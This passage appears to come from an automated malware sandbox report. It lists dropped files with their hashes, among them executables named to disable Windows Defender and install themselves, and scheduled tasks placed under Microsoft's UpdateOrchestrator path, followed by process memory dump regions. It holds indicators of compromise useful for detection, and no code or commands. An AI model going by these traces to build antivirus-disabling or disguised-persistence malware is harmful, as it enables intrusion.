                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\x69.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      68KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      143b1a26c0fdda10f74ba1b6249e020a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      30a01b28f4f205bc594f8d6665963eaa49d172e3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      22d6b7ab5c8a05162d36d2981b715c28

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\x69install.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      181KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b89953da384c6a80b03e5b3abece33c9

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8495ca680bc958f7b1c5525c2e92200fc9fa1864

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963

                                                                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                                                                    • memory/316-592-0x00000209C6C40000-0x00000209C6C6C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/316-593-0x00007FF9939D0000-0x00007FF9939E0000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                    • memory/316-586-0x00000209C6C40000-0x00000209C6C6C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/616-559-0x00000165D95E0000-0x00000165D960C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/616-560-0x00007FF9939D0000-0x00007FF9939E0000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                    • memory/616-552-0x00000165D95E0000-0x00000165D960C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/616-551-0x00000165D95A0000-0x00000165D95C6000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      152KB

                                                                                                                                                                                                                    • memory/616-553-0x00000165D95E0000-0x00000165D960C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/676-571-0x00007FF9939D0000-0x00007FF9939E0000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                    • memory/676-570-0x000001C58C900000-0x000001C58C92C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/676-564-0x000001C58C900000-0x000001C58C92C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/744-597-0x0000018FBBEE0000-0x0000018FBBF0C000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/884-63-0x00007FF9B57A3000-0x00007FF9B57A5000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                    • memory/884-0-0x00007FF9B57A3000-0x00007FF9B57A5000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                    • memory/884-101-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                    • memory/884-2-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                    • memory/884-1-0x00000000002E0000-0x000000000032E000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      312KB

                                                                                                                                                                                                                    • memory/960-575-0x0000017E0B7B0000-0x0000017E0B7DC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/960-581-0x0000017E0B7B0000-0x0000017E0B7DC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                    • memory/960-582-0x00007FF9939D0000-0x00007FF9939E0000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                    • memory/1180-3-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                    • memory/1180-5-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                    • memory/1180-4-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                    • memory/1180-18-0x00007FF9B57A0000-0x00007FF9B6261000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10.8MB

                                                                                                                                                                                                                    • memory/1180-12-0x000001E96D560000-0x000001E96D582000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                    • memory/1408-535-0x00007FF9D3950000-0x00007FF9D3B45000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                    • memory/1408-534-0x000001EF1FC90000-0x000001EF1FCBA000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      168KB

                                                                                                                                                                                                                    • memory/1408-536-0x00007FF9D2F00000-0x00007FF9D2FBE000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      760KB

                                                                                                                                                                                                                    • memory/1584-538-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/1584-545-0x00007FF9D3950000-0x00007FF9D3B45000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                    • memory/1584-540-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/1584-548-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/1584-539-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/1584-546-0x00007FF9D2F00000-0x00007FF9D2FBE000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      760KB

                                                                                                                                                                                                                    • memory/1584-537-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/1584-542-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                    • memory/1640-344-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                    • memory/1640-46-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                    • memory/2236-389-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                    • memory/2516-533-0x0000000000CD0000-0x0000000000CD9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/2516-64-0x0000000000CD0000-0x0000000000CD9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/2516-1476-0x0000000000CD0000-0x0000000000CD9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/2916-82-0x0000000000870000-0x00000000008A1000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      196KB

                                                                                                                                                                                                                    • memory/4600-1374-0x000000001BAC0000-0x000000001BACE000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                    • memory/4600-1375-0x000000001EE50000-0x000000001F378000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.2MB

                                                                                                                                                                                                                    • memory/4600-25-0x0000000000DA0000-0x0000000000DB8000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      96KB

                                                                                                                                                                                                                    • memory/4648-100-0x00000000005D0000-0x00000000005D9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/4648-1477-0x00000000005D0000-0x00000000005D9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/4648-547-0x00000000005D0000-0x00000000005D9000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                    • memory/5056-109-0x0000000000870000-0x00000000008A1000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      196KB